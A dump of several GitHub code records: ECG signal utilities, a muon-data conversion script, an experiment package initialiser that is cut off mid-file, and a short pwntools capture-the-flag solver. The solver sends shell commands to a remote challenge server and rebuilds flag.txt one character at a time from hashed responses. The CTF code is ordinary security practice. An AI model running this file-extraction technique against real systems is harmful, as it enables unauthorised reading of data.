data_conn.commit()\n\ndef transform_msg(selected_line, replace_txt = ('',)):\n \"\"\"\n Transforms a message noted by selected_line into a version whose specific\n keywords are converted into the values noted by replace_txt.\n\n Args:\n selected_line (str): The line of message to be transformed\n replace_txt (tuple): A tuple whose contents note the substitute values\n of keywords in selected_line.\n \n Returns:\n str: The transformed version of message.\n \"\"\"\n params = re.findall(r'({[^{}]+})', selected_line)\n for param_pair in zip(params, replace_txt[:len(params)]):\n replacement = get_global_attr(param_pair[0][1:-1])\n selected_line = selected_line.replace(\n param_pair[0], \n replacement or param_pair[1]\n )\n return selected_line\n","repo_name":"Bransthre/project-lip","sub_path":"function_backend/global_database.py","file_name":"global_database.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31413814902","text":"#!/usr/bin/python3\nimport hashlib, string\nfrom pwn import *\n\nd = {}\nfor c in string.printable:\n\tif c == '\\0' or c == '\\r' or c == '\\n':\n\t\tcontinue\n\td[hashlib.sha256((c+\"\\n\").encode()).hexdigest()] = c\n\td[hashlib.sha256((c+2*\"\\n\").encode()).hexdigest()] = c\n\td[hashlib.sha256((c).encode()).hexdigest()] = c\n\n\nflag = \"\"\np = remote(\"ctf.cs.technion.ac.il\", 4014)\np.recv()\ni = 1\nwhile True:\n\tp.sendline(\"cat ./flag.txt | sed -n 1p | cut -c {}\".format(i).encode())\n\ttry:\n\t\tr = p.recv().decode().split(\"\\n\")\n\t\tprint(r)\n\texcept:\n\t\tp = remote(\"ctf.cs.technion.ac.il\", 4014, level='error')\n\t\tp.recv()\n\t\tcontinue\n\tfinally:\n\t\ttry:\n\t\t\tflag += d[r[0]]\n\t\texcept:\n\t\t\tpass #flag += '?'\n\t\tfinally:\n\t\t\ti += 1\n\t\t\tprint(flag)\n","repo_name":"Eladkay/Technion-CTF","sub_path":"script3_bashed.py","file_name":"script3_bashed.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71737963243","text":"import os\nimport math\nimport glob\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\nimport h5py\nimport scipy.optimize\nimport wfdb\nfrom wfdb import processing\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom .util import *\nfrom .data_path import PATH_BASE, DIR_DSET\nfrom .check_args import ca\n\n\ndef plot_1d(arr, label=None, title=None, save=False, s=None, e=None, new_fig=True, plot_kwargs=None, show=True):\n \"\"\" Plot potentially multiple 1D signals \"\"\"\n kwargs = LN_KWARGS\n if plot_kwargs is not None:\n kwargs |= plot_kwargs\n\n if new_fig:\n plt.figure(figsize=(18, 6))\n if not isinstance(arr, list):\n arr = list(arr) if isinstance(arr, np.ndarray) else arr[arr]\n if not isinstance(label, list):\n label = [label] * len(arr)\n lbl = [None for _ in arr] if label is None else label\n cs = sns.color_palette('husl', n_colors=len(arr))\n\n def _plot(a_, lb_, c_):\n a_ = a_[s:e]\n args = dict(c=c_) | kwargs\n plt.gca().plot(np.arange(a_.size), a_, label=lb_, **args)\n for a, lb, c in zip(arr, lbl, cs):\n _plot(a, lb, c)\n\n if label:\n handles, labels = plt.gca().get_legend_handles_labels() # Distinct labels\n by_label = dict(zip(labels, handles))\n plt.legend(by_label.values(), by_label.keys())\n if title:\n plt.title(title)\n if new_fig:\n save_fig(title, save)\n if show:\n plt.show()\n\n\ndef plot_ecg(\n arr: np.ndarray, title: str = None, ax=None, legend: bool = True, gap_factor: float = 1.0,\n save: bool = False, show: bool = True,\n xlabel: str = 'Timestep (potentially resampled)', ylabel: str = 'Amplitude, normalized (mV)'\n):\n n_lead = arr.shape[0]\n height = (abs(np.max(arr)) + abs(np.min(arr))) / 4 * gap_factor # Empirical\n\n if ax:\n plt.sca(ax)\n else:\n plt.figure(figsize=(16, 13))\n ax = plt.gca()\n\n ylb_ori = ((np.arange(n_lead) - n_lead + 1) * height)[::-1]\n ylb_new = ['I', 'II', 'III', 'avR', 'avL', 'avF', 'V1', 'V2', 'V3', 'V4', 'V5', 'V6'] # TODO; verify order\n cs = sns.color_palette('husl', n_colors=n_lead)\n for i, row in enumerate(arr):\n offset = height * i\n x = np.arange(row.size)\n y = row - offset\n ax.plot(x, y, label=ylb_new[i], marker='o', ms=0.3, lw=0.25, c=cs[i])\n ax.axhline(y=-offset, lw=0.2)\n\n title = title or 'ECG 12-lead plot'\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.yticks(ylb_ori, ylb_new)\n if legend:\n handles, labels = plt.gca().get_legend_handles_labels() # Distinct labels\n by_label = dict(zip(labels, handles))\n plt.legend(by_label.values(), by_label.keys(), bbox_to_anchor=(1.05, 1))\n if show:\n plt.show()\n save_fig(title, save)\n\n\ndef r2(y, y_fit):\n return 1 - (np.square(y - y_fit).sum() / np.square(y - np.mean(y)).sum())\n\n\ndef fit_power_law(x: np.ndarray, y: np.ndarray, return_fit: Union[int, bool] = False):\n \"\"\"\n :return: 2-tuple of (coefficient, exponent) for power law\n If `return_fit` is True, return additionally 2-tuple of (fitted x, fitted y)\n If integer given, the fitted curve is returned by scale\n \"\"\"\n def pow_law(x_, a, b):\n return a * np.power(x_, b)\n x, y = np.asarray(x).astype(float), np.asarray(y)\n (a_, b_), p_cov = scipy.optimize.curve_fit(f=pow_law, xdata=x, ydata=y, p0=(x[0]*2, -1))\n\n ret = (a_, b_)\n if return_fit:\n scale = 1 if return_fit is True else return_fit\n x_plot = np.linspace(x.min(), x.max(), num=x.size * scale)\n y_fit = pow_law(x_plot, a_, b_)\n ret = ret, (x_plot, y_fit)\n return ret\n\n\ndef plot_resampling(x, y, x_, y_, title=None):\n \"\"\"\n Plots the original signal pair and it's resampled version\n \"\"\"\n plt.figure(figsize=(16, 9))\n plt.plot(x, y, marker='o', ms=4, lw=5, label='Original', alpha=0.5)\n plt.plot(x_, y_, marker='x', ms=4, lw=1, label='Resampled') # ls=(0, (2, 5)),\n if title:\n plt.title(title)\n plt.legend()\n plt.show()\n\n\ndef plot_rpeak(sig, idx_rpeak, title=None):\n x = np.arange(sig.size)\n\n plt.figure(figsize=(16, 9))\n plt.plot(x, sig, marker='o', ms=0.3, lw=0.25, label='Original', alpha=0.5)\n\n for i in idx_rpeak:\n plt.axvline(x=i, c='r', lw=0.5, label='R peak')\n\n t = 'ECG R-peaks'\n if title:\n t = f'{t}, {title}'\n plt.title(t)\n handles, labels = plt.gca().get_legend_handles_labels() # Distinct labels\n by_label = dict(zip(labels, handles))\n plt.legend(by_label.values(), by_label.keys())\n plt.show()\n\n\ndef refine_rpeak(sig, idxs_peak, fqs, r_wd=100):\n \"\"\"\n :param sig: 1D ECG signal\n :param idxs_peak: Indices of tentative R peaks\n :param fqs: Sample frequency\n :param r_wd: Half range in ms to look for optimal R peak\n :return: Refined R peak indices\n \"\"\"\n return processing.correct_peaks(\n sig, idxs_peak,\n search_radius=math.ceil(fqs * r_wd / 1e3),\n smooth_window_size=2, # TODO: what's this?\n peak_dir='up'\n )\n\n\ndef get_processed_path():\n \"\"\"\n Path where the processed records are stored\n \"\"\"\n return os.path.join(PATH_BASE, DIR_DSET, config('datasets.my.dir_nm'))\n\n\ndef get_my_rec_labels():\n d_my = config(f'{DIR_DSET}.my')\n recs_csv_fnm = os.path.join(PATH_BASE, DIR_DSET, d_my['dir_nm'], d_my['fnm_labels'])\n df = pd.read_csv(recs_csv_fnm)\n return df.apply(lambda x: x.astype('category'))\n\n\ndef get_rec_paths(dnm):\n d_dset = config(f'{DIR_DSET}.{dnm}')\n dir_nm = d_dset['dir_nm']\n path_ = f'{PATH_BASE}/{DIR_DSET}/{dir_nm}'\n return sorted(glob.iglob(f'{path_}/{d_dset[\"rec_fmt\"]}', recursive=True))\n\n\ndef get_record_eg(dnm, n=0, ln=None):\n \"\"\"\n Get an arbitrary record\n\n :param dnm: Dataset name\n :param n: Entry in the dataset\n :param ln: Number of samples in the record\n if None, full record returned\n\n .. note:: Works only if a wfdb record file exists\n \"\"\"\n rec_path = get_rec_paths(dnm)[n]\n kwargs = dict(sampto=ln)\n kwargs = {k: v for k, v in kwargs.items() if k is not None}\n return wfdb.rdrecord(rec_path[:rec_path.index('.')], **kwargs)\n\n\ndef fnm2sigs(fnm, dnm, to_fp32: bool = True):\n if dnm == 'CHAP-SHAO':\n arr = pd.read_csv(fnm).to_numpy().T\n elif dnm == 'CODE-TEST': # one hdf5 file with all recordings\n assert isinstance(fnm, int)\n if not hasattr(config, 'ct_tracings'):\n fnms = get_rec_paths(dnm)\n assert len(fnms) == 1\n fnm2sigs.ct_tracings = h5py.File(fnm, 'r')\n\n arr = fnm2sigs.ct_tracings['tracings'][fnm]\n else:\n arr = wfdb.rdsamp(fnm.removesuffix(config(f'datasets.{dnm}.rec_ext')))[0].T # (signal, meta)\n if to_fp32:\n arr = arr.astype(np.float32) # for faster processing, & for ML anyway\n return arr\n\n\ndef get_signal_eg(dnm=None, n=None):\n \"\"\"\n :param dnm: Dataset name, sampled at random if not given\n :param n: Entry in the dataset, sampled at random if not given\n :return: A 12*`l` array of raw signal samples\n \"\"\"\n if dnm is None:\n dsets = config('datasets_export.total')\n idx = np.random.randint(len(dsets))\n dnm = dsets[idx]\n if n is None:\n n = np.random.randint(config(f'{DIR_DSET}.{dnm}.n_rec'))\n\n if dnm == 'CHAP_SHAO':\n return fnm2sigs(get_rec_paths(dnm)[n], dnm)\n elif dnm == 'CODE_TEST':\n return fnm2sigs(n, dnm)\n else:\n return get_record_eg(dnm, n=n).p_signal\n\n\ndef get_nlm_denoise_truth(verbose=False):\n dnm = 'CHAP_SHAO'\n fnm = get_rec_paths(dnm)[77] # Arbitrary\n fnm_stem = stem(fnm)\n dbg_path = os.path.join(PATH_BASE, DIR_DSET, config(f'{DIR_DSET}.{dnm}.dir_nm'), 'my_denoise_debugging')\n if verbose:\n ic(fnm, fnm_stem)\n ic(dbg_path)\n\n df = pd.read_csv(fnm)\n df_de = pd.read_csv(fnm.replace('ECGData', 'ECGDataDenoised'), header=None)\n if verbose:\n ic(fnm)\n ic(len(df))\n ic(df_de.head(6))\n ic(df_de.iloc[:6, 0])\n\n fnm_lowpass = os.path.join(dbg_path, f'{fnm_stem}, lowpass.csv')\n fnm_rloess = os.path.join(dbg_path, f'{fnm_stem}, rloess.csv')\n fnm_localres = os.path.join(dbg_path, f'{fnm_stem}, localres.csv')\n fnm_after2nd = os.path.join(dbg_path, f'{fnm_stem}, after2nd.csv')\n\n return (\n df.iloc[:]['I'].to_numpy(),\n df_de.iloc[:][0].to_numpy(),\n pd.read_csv(fnm_lowpass, header=None).iloc[:, 0].to_numpy(),\n pd.read_csv(fnm_rloess, header=None).iloc[:, 0].to_numpy(),\n pd.read_csv(fnm_localres, header=None).iloc[:, 0].to_numpy(),\n pd.read_csv(fnm_after2nd, header=None).iloc[:, 0].to_numpy()\n )\n\n\ndef get_processed_record_path(dataset_name, type: str = 'denoised'):\n ca(type=type, dataset_name=dataset_name)\n fmt = 'rec_fmt_denoised' if type == 'denoised' else 'rec_fmt'\n return os.path.join(get_processed_path(), config(f'datasets.my.{fmt}') % dataset_name)\n\n\nif __name__ == '__main__':\n from icecream import ic\n\n ic(get_signal_eg(dnm='G12EC', n=0).shape)\n ic(get_signal_eg(dnm='CHAP_SHAO', n=0))\n ic(get_signal_eg(dnm='CODE_TEST', n=0).shape)\n\n for dnm_ in config(f'datasets_export.total'):\n path = get_rec_paths(dnm_)[0]\n ic(dnm_, stem(path, ext=True), sizeof_fmt(os.path.getsize(path)))\n","repo_name":"StefanHeng/ECG-Representation-Learning","sub_path":"ecg_transformer/util/ecg.py","file_name":"ecg.py","file_ext":"py","file_size_in_byte":9311,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"42820655065","text":"import ROOT as r\n\nimport pyhepmc.io\nimport numpy as np\nimport random\n\nz_FLArE_F2= 10260\noutput_file = f'/data/atlassmallfiles/users/salin/acts_F2/GEN/Muon_FLArE/convert/test/Particles_muon_FLArE_test_z{z_FLArE_F2}m.root'\n\n\n# Define the particle data types\nparticles_dtype = {\n \"event_id\": np.int32,\n \"particle_id\": \"unsigned long\",\n \"particle_type\": \"int\",\n \"process\": \"unsigned int\",\n \"vx\": \"double\",\n \"vy\": \"double\",\n \"vz\": \"double\",\n \"vt\": \"double\",\n \"px\": \"double\",\n \"py\": \"double\",\n \"pz\": \"double\",\n \"m\": \"double\",\n \"q\": \"double\",\n \"eta\": \"double\",\n \"phi\": \"double\",\n \"theta\": \"double\",\n \"pt\": \"double\",\n \"p\": \"double\",\n \"vertex_primary\": \"unsigned int\",\n \"vertex_secondary\": \"unsigned int\",\n \"particle\": \"unsigned int\",\n \"generation\": \"unsigned int\",\n \"sub_particle\": \"unsigned int\"\n}\n\n# Create a ROOT file and tree\noutput = r.TFile(output_file, \"RECREATE\")\ntree = r.TTree(\"particles\", \"Particle information\")\n\n# Create vectors for each branch\nevent_id = np.zeros(1, dtype=np.int32)\nparticle_id = r.vector('unsigned long')()\nparticle_type = r.vector('int')()\nprocess = r.vector('unsigned int')()\nvx = r.vector('double')()\nvy = r.vector('double')()\nvz = r.vector('double')()\nvt = r.vector('double')()\npx = r.vector('double')()\npy = r.vector('double')()\npz = r.vector('double')()\nm = r.vector('double')()\nq = r.vector('double')()\neta = r.vector('double')()\nphi = r.vector('double')()\ntheta = r.vector('double')()\npt = r.vector('double')()\np = r.vector('double')()\nvertex_primary = r.vector('unsigned int')()\nvertex_secondary = r.vector('unsigned int')()\nparticle = r.vector('unsigned int')()\ngeneration = r.vector('unsigned int')()\nsub_particle = r.vector('unsigned int')()\n\n# Add the branches to the tree\ntree.Branch(\"event_id\", event_id,\"event_id/i\")\ntree.Branch(\"particle_id\", particle_id)\ntree.Branch(\"particle_type\", particle_type)\ntree.Branch(\"process\", process)\ntree.Branch(\"vx\", vx)\ntree.Branch(\"vy\", vy)\ntree.Branch(\"vz\", vz)\ntree.Branch(\"vt\", vt)\ntree.Branch(\"px\", px)\ntree.Branch(\"py\", py)\ntree.Branch(\"pz\", pz)\ntree.Branch(\"m\", m)\ntree.Branch(\"q\", q)\ntree.Branch(\"eta\", eta)\ntree.Branch(\"phi\", phi)\ntree.Branch(\"theta\", theta)\ntree.Branch(\"pt\", pt)\ntree.Branch(\"p\", p)\ntree.Branch(\"vertex_primary\", vertex_primary)\ntree.Branch(\"vertex_secondary\", vertex_secondary)\ntree.Branch(\"particle\", particle)\ntree.Branch(\"generation\", generation)\ntree.Branch(\"sub_particle\", sub_particle)\n\n\n# Calculate the particle's eta, phi, pt,p\n#IMPORTANT1 : There was a rotation in the Axis from XYZ into Z'Y'X'(new beamline along X' and Magnetic field along Z') to make ACTS work Z-> X' and X->-Z'\n#IMPORTANT2 Different definition ACTS and FORESEE Y->X->Z'\n\n#Take information from the muon simulation\n# Load muon data\nfilename_mu = '/data/atlassmallfiles/users/salin/acts_F2/GEN/Muon_FLArE/muons.root'\nfile_mu = r.TFile(filename_mu)\ntree_mu = file_mu.Get(\"muons\")\n\n\n\nn_entries = tree_mu.GetEntries()\n\nfor i in range(n_entries):\n tree_mu.GetEntry(i)\n\n vx_mu = tree_mu.vz # IMPORTANT1: vertex_x' -> vertex_z\n vy_mu = - tree_mu.vx # IMPORTANT1 and IMPORTANT2: vertex_y'>vertex_x'->-vertex_z-> -vertex_x\n vz_mu = tree_mu.vy #vertex_z' ->-vertex_x-> vertex_y *IMPORTANT1 and IMPORTANT2\n px_mu = tree_mu.pz #pz'->px\n py_mu = - tree_mu.px #py'->px'->-pz -> -px\n pz_mu = tree_mu.py #pz'->-px->py\n E_mu = tree_mu.E\n\n\n p_mu = np.sqrt(px_mu**2 + py_mu**2 + pz_mu**2)\n theta_mu = np.arccos(pz_mu/p_mu)\n phi_mu = np.arctan2(py_mu, px_mu)\n eta_mu = 0.5 * np.log((p_mu + pz_mu) / (p_mu - pz_mu))\n pt_mu = np.sqrt(px_mu**2 + py_mu**2)\n\n event_id[0] = i\n particle_id.push_back(4503599660924928)\n particle_type.push_back(13) # assuming muon if pz<0, else anti-muon\n process.push_back(0)\n vx.push_back(vx_mu-z_FLArE_F2) # IMPORTANT1: vertex_x' -> vertex_z\n vy.push_back(vy_mu) # IMPORTANT1 and IMPORTANT2: vertex_y'>vertex_x'->-vertex_z\n vz.push_back(vz_mu) # IMPORTANT1 and IMPORTANT2: vertex_z' ->-vertex_x-> vertex_y\n vt.push_back(0)\n px.push_back(px_mu) # pz'->px\n py.push_back(py_mu) # py'->px'->-pz\n pz.push_back(pz_mu) # pz'->-px->py\n m.push_back(0.105658) # muon mass\n q.push_back(-1) # assuming muon if pz<0, else anti-muon\n eta.push_back(eta_mu)\n phi.push_back(phi_mu)\n theta.push_back(theta_mu)\n pt.push_back(pt_mu)\n p.push_back(p_mu)\n vertex_primary.push_back(1)\n vertex_secondary.push_back(0)\n particle.push_back(1) # assuming muon if pz<0, else anti-muon\n generation.push_back(0)\n sub_particle.push_back(0)\n\n tree.Fill()\n\n particle_id.clear()\n particle_type.clear()\n process.clear()\n vx.clear()\n vy.clear()\n vz.clear()\n vt.clear()\n px.clear()\n py.clear()\n pz.clear()\n m.clear()\n q.clear()\n eta.clear()\n phi.clear()\n theta.clear()\n pt.clear()\n p.clear()\n vertex_primary.clear()\n vertex_secondary.clear()\n particle.clear()\n generation.clear()\n sub_particle.clear()\n\noutput.Write()\noutput.Close()\n","repo_name":"ldk111/FASER-2-MPhys-Project","sub_path":"Muon Flux Data Preparation/Olivier Example Scripts/Convert_Muon_ACTS.py","file_name":"Convert_Muon_ACTS.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26341833431","text":"# Package initialisation file.\n#\n# This file's role is to grab the relevant configuration preferences from\n# /config/CONFIG.py and initialise the package.\n#\n# Do not add variables here that would be considered configuration parameters;\n# only use this file to load the relevant configuration preferences from the\n# CONFIG.py file, and to make them available to the other modules.\n\n# To actually add/edit configuration options, edit the /config/CONFIG.py file\n# directly (using normal python syntax), and then import / export here as\n# needed.\n\n\n\n#################################################################\n### Initial imports and sanity checks required for initialization\n#################################################################\n\nimport os\nimport sys\nimport numpy\nimport importlib\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'\nimport pygame\n\n# Check if --config was specified. If not, load the default CONFIG.py file.\nif '--config' in sys.argv:\n ConfigParam = sys.argv[ sys.argv.index( '--config' ) + 1 ]\n ConfigPath = os.path.abspath( os.path.dirname( ConfigParam ) )\n ConfigModule = os.path.basename( ConfigParam )\n assert ConfigModule.endswith('py'), \"The specified config file needs to be a valid python module\"\n ConfigModule = ConfigModule[ : -3 ]\n sys.path.append( ConfigPath )\n CONFIG = importlib.import_module( ConfigModule )\nelse:\n from . config import CONFIG\n\n\n# Detect package directory, and use to create standard paths relative to package\n# root.\n\nPKG_ROOT = os.path.abspath( os.path.dirname( __file__ ) )\nCONFIG_FILE = CONFIG.__file__\nDOCUMENTATION_PATH = os.path.join( PKG_ROOT, 'doc' )\nRESOURCES_PATH = os.path.join( PKG_ROOT, 'res' )\n\n# ANSI colour escape codes (for use in logging/debug messages)\nclass ANSI:\n BOLD = '\\033[1m'\n RED = '\\033[91m'\n GREEN = '\\033[92m'\n ORANGE = '\\033[93m'\n BLUE = '\\033[94m'\n PURPLE = '\\033[95m'\n RESET = '\\033[0m'\n\n\n# Check that we are running in the context of a python virtual env, to ensure\n# consistency/reproducibility between runs, in terms of what python\n# packages/versions are installed and used in the experiment.\n\nif not os.getenv( 'VIRTUAL_ENV' ):\n print(\nf\"\"\"{ANSI.PURPLE}\n\nWarning: No suitable VIRTUAL_ENV environmental variable detected.\n\nIn order to ensure consistency / reproducibility between runs, you might want to\nconsider always running this experiment from within a suitable python virtual\nenvironment, containing the python package versions specified in the package's\nrequirements.txt file.\n\nPress ENTER if you'd like to continue regardless (or Ctrl-C to abort).\n\n{ANSI.RESET}\"\"\" )\n try : input() # i.e. press Enter\n except KeyboardInterrupt: print( '\\n\\nExiting...' ); exit()\n\n\n\n###################################\n### Process selected CONFIG.py file\n###################################\n\n# Import all configuration constants\nAGGREGATION_METHOD = CONFIG.AGGREGATION_METHOD\nALLOCATION_TYPE = CONFIG.ALLOCATION_TYPE\nAVAILABLE_RESOURCES_PER_SEQUENCE = CONFIG.AVAILABLE_RESOURCES_PER_SEQUENCE\nAVATAR_ICONS_SET = CONFIG.AVATAR_ICONS_SET\nBIOSEMI_CONNECTED = CONFIG.BIOSEMI_CONNECTED\nBLOCK_MODE_INDICES = CONFIG.BLOCK_MODE_INDICES\nCITY_RADIUS_REFLECTS_SEVERITY = CONFIG.CITY_RADIUS_REFLECTS_SEVERITY\nCOLORS = CONFIG.COLORS\nCONFIDENCE_TIMEOUT = CONFIG.CONFIDENCE_TIMEOUT\nCONFIDENCE_UPDATE_AMOUNT = CONFIG.CONFIDENCE_UPDATE_AMOUNT\nDEBUG = CONFIG.DEBUG\nDEBUG_RESOLUTION = CONFIG.DEBUG_RESOLUTION\nDETECT_USER_RESOLUTION = CONFIG.DETECT_USER_RESOLUTION\nDISPLAY_FEEDBACK = CONFIG.DISPLAY_FEEDBACK\nFALLBACK_RESOLUTION = CONFIG.FALLBACK_RESOLUTION\nFEEDBACK_SHOW_COMBINED_ALLOCATIONS = CONFIG.FEEDBACK_SHOW_COMBINED_ALLOCATIONS\nFEEDBACK_SHOW_GROUP_PERFORMANCE = CONFIG.FEEDBACK_SHOW_GROUP_PERFORMANCE\nFEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES = CONFIG.FEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES\nFORCE_MOUSEWHEEL_SCROLL_CONFIDENCE = CONFIG.FORCE_MOUSEWHEEL_SCROLL_CONFIDENCE\nINIT_NO_OF_CITIES = CONFIG.INIT_NO_OF_CITIES\nINITIAL_SEVERITY_FILE = CONFIG.INITIAL_SEVERITY_FILE\nINPUTS_PATH = CONFIG.get_INPUTS_PATH( PKG_ROOT )\nLIVE_EXPERIMENT = CONFIG.LIVE_EXPERIMENT\nLOBBY_PLAYERS = CONFIG.LOBBY_PLAYERS\nLOBBY_TIMEOUT = CONFIG.LOBBY_TIMEOUT\nMAX_ALLOCATABLE_RESOURCES = CONFIG.MAX_ALLOCATABLE_RESOURCES\nMAX_INIT_RESOURCES = CONFIG.MAX_INIT_RESOURCES\nMAX_INIT_SEVERITY = CONFIG.MAX_INIT_SEVERITY\nMIN_ALLOCATABLE_RESOURCES = CONFIG.MIN_ALLOCATABLE_RESOURCES\nMIN_INIT_RESOURCES = CONFIG.MIN_INIT_RESOURCES\nMIN_INIT_SEVERITY = CONFIG.MIN_INIT_SEVERITY\nMOVEMENT_REFRESH_RATE = CONFIG.MOVEMENT_REFRESH_RATE\nNUM_ATTEMPTS_TO_ASSIGN_SEQ = CONFIG.NUM_ATTEMPTS_TO_ASSIGN_SEQ\nNUM_BLOCKS = CONFIG.NUM_BLOCKS\nNUM_MAX_TRIALS = CONFIG.NUM_MAX_TRIALS\nNUM_MIN_TRIALS = CONFIG.NUM_MIN_TRIALS\nNUM_PREDEFINED_CITY_COORDS = CONFIG.NUM_PREDEFINED_CITY_COORDS\nNUM_SEQUENCES = CONFIG.NUM_SEQUENCES\nOUTPUT_FILE_PREFIX = CONFIG.OUTPUT_FILE_PREFIX\nOUTPUTS_PATH = CONFIG.get_OUTPUTS_PATH( PKG_ROOT )\nPANDEMIC_PARAMETER = CONFIG.PANDEMIC_PARAMETER\nPLAYER_TYPE = CONFIG.PLAYER_TYPE\nRANDOM_INITIAL_SEVERITY = CONFIG.RANDOM_INITIAL_SEVERITY\nRESPONSE_TIMEOUT = CONFIG.RESPONSE_TIMEOUT\nSAVE_INITIAL_SEVERITY_TO_FILE = CONFIG.SAVE_INITIAL_SEVERITY_TO_FILE\nSAVE_RESULTS = CONFIG.SAVE_RESULTS\nSEQ_LENGTHS_FILE = CONFIG.SEQ_LENGTHS_FILE\nSHOW_BEFORE_AND_AFTER_MAP = CONFIG.SHOW_BEFORE_AND_AFTER_MAP\nSHOW_PYGAME_IF_NONHUMAN_PLAYER = CONFIG.SHOW_PYGAME_IF_NONHUMAN_PLAYER\nSTARTING_BLOCK_INDEX = CONFIG.STARTING_BLOCK_INDEX\nSTARTING_SEQ_INDEX = CONFIG.STARTING_SEQ_INDEX\nTOTAL_NUM_TRIALS_IN_BLOCK = CONFIG.TOTAL_NUM_TRIALS_IN_BLOCK\nTRUST_MAX = CONFIG.TRUST_MAX\nUSE_FIXED_BLOCK_SEQUENCES = CONFIG.USE_FIXED_BLOCK_SEQUENCES\nVERBOSE = CONFIG.VERBOSE\nAGENT_NOISE_VARIANCE = CONFIG.AGENT_NOISE_VARIANCE\nAGENT_WAIT = CONFIG.AGENT_WAIT\n\n\n##########################################\n### Process imported configuration options\n##########################################\n\nif PLAYER_TYPE == 'playback': PLAYBACK_ID = CONFIG.PLAYBACK_ID\nelse : PLAYBACK_ID = 'N/A'\n\nRESPONSE_MULTIPLIER = PANDEMIC_PARAMETER\nSEVERITY_MULTIPLIER = 1 + PANDEMIC_PARAMETER\n\n\n\n##################################################################\n### Continue with non-configuration-related package initialization\n##################################################################\n\n# Let's define some some quick utility functions for logging purposes\ndef printcolor ( Str, AnsiColor, *args, **kwargs ): print( f\"{AnsiColor}{Str}{ANSI.RESET}\", *args, **kwargs )\ndef printstatus( Str, AnsiColor, *args, **kwargs ): print( f\"{AnsiColor}[{ANSI.RESET}{Str}{AnsiColor}]{ANSI.RESET}\", *args, **kwargs )\ndef printinfo ( Str, *args, **kwargs ) : printcolor( Str , ANSI.BLUE, *args, **kwargs )\ndef printconfig( Varname, Var, SuggestedValue = None ) :\n if SuggestedValue is None or Var == SuggestedValue:\n printinfo( f\"__init__: Setting { Varname } to { ANSI.ORANGE }{ Var }\" )\n else:\n printinfo( f\"__init__: Setting { Varname } to { ANSI.BOLD + ANSI.RED }{ Var }{ ANSI.RESET } (Suggested: {SuggestedValue})\" )\n\nprintinfo( \"\\n--- Initializing experiment ---\\n\" )\n\n# Import package documentation (to avoid having to dump it all on the top of this file instead). You could follow a\n# similar strategy in other modules if they are to contain significant documentation that would clutter the sources.\nPkgDoc = os.path.join( DOCUMENTATION_PATH, 'PES.__doc__' )\nwith open( PkgDoc, 'r' ) as f: __doc__ = f.read()\n\n# RGB tuples of frequently used colours\nWHITE = (255, 255, 255)\nYELLOW = (255, 255, 0)\nBLACK = ( 0, 0, 0)\nDARK_RED = (128, 0, 0)\nDARK_CYAN = ( 0, 128, 128)\nDARK_GREEN = ( 0, 128, 0)\nGREEN = ( 0, 255, 0)\nRED = (255, 0, 0)\nGRAY = ( 50, 50, 50)\nLIGHTGRAY = (180, 180, 180)\nLIGHTBLUE = (210, 220, 255)\n\n# The experiment uses tensorflow, which has a nasty habit of dumping lots of\n# warning messages for missing nvidia libraries etc. The following environmental\n# variable disables these. ( '0': all logs are shown; '1': filter out INFOs and\n# below; '2': filter out WARNs; '3': filter out ERRORs, etc )\nos.environ[ 'TF_CPP_MIN_LOG_LEVEL' ] =\"2\"\n\n# Set some nice numpy printing defaults and error handling\nnumpy.set_printoptions( threshold = numpy.inf, precision = 3, suppress = True,\n linewidth = 80, nanstr = \"--\", infstr = \"∞\" )\nnumpy.seterr( all = 'raise' )\n\n# Print all (important) final init variables to terminal\nif VERBOSE not in [ True, False ]:\n raise ValueError( 'Bad value given for VERBOSE environmental variable. Needs to be True or False.' )\n\n\nif VERBOSE:\n# Variable name Variable Value Suggested value check\n printconfig( 'PKG_ROOT' , PKG_ROOT )\n printconfig( 'CONFIG_FILE' , CONFIG_FILE )\n printconfig( 'AGGREGATION_METHOD' , AGGREGATION_METHOD, 'confidence_weighted_median' )\n printconfig( 'ALLOCATION_TYPE' , ALLOCATION_TYPE, 'shared' )\n printconfig( 'AVAILABLE_RESOURCES_PER_SEQUENCE' , AVAILABLE_RESOURCES_PER_SEQUENCE, 49 )\n printconfig( 'AVATAR_ICONS_SET' , AVATAR_ICONS_SET, 'PlaceholderAvatars' )\n printconfig( 'BLOCK_MODE_INDICES' , BLOCK_MODE_INDICES )\n printconfig( 'CITY_RADIUS_REFLECTS_SEVERITY' , CITY_RADIUS_REFLECTS_SEVERITY, False )\n printconfig( 'COLORS' , COLORS )\n printconfig( 'CONFIDENCE_TIMEOUT' , CONFIDENCE_TIMEOUT, 5000 )\n printconfig( 'CONFIDENCE_UPDATE_AMOUNT' , CONFIDENCE_UPDATE_AMOUNT, 0.05 )\n printconfig( 'DEBUG' , DEBUG, False )\n printconfig( 'DEBUG_RESOLUTION' , DEBUG_RESOLUTION, (762, 720) )\n printconfig( 'DETECT_USER_RESOLUTION' , DETECT_USER_RESOLUTION, True )\n printconfig( 'DISPLAY_FEEDBACK' , DISPLAY_FEEDBACK, True )\n printconfig( 'FALLBACK_RESOLUTION' , FALLBACK_RESOLUTION, (1143, 1080) )\n printconfig( 'FEEDBACK_SHOW_COMBINED_ALLOCATIONS' , FEEDBACK_SHOW_COMBINED_ALLOCATIONS, False )\n printconfig( 'FEEDBACK_SHOW_GROUP_PERFORMANCE' , FEEDBACK_SHOW_GROUP_PERFORMANCE , True )\n printconfig( 'FEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES', FEEDBACK_SHOW_INDIVIDUAL_PERFORMANCES, False )\n printconfig( 'FORCE_MOUSEWHEEL_SCROLL_CONFIDENCE' , FORCE_MOUSEWHEEL_SCROLL_CONFIDENCE, False )\n printconfig( 'INIT_NO_OF_CITIES' , 